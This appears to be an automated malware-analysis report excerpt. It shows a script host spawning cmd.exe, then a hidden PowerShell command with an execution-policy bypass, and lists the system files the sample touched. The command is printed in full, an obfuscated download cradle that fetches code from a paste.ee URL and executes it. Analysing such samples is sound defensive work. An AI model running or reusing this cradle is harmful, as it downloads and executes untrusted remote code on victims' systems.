parent_process wscript.exe martian_process Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
PowerShell command-line options flagged (reported once for each of the three PowerShell command lines above):
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -wind hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe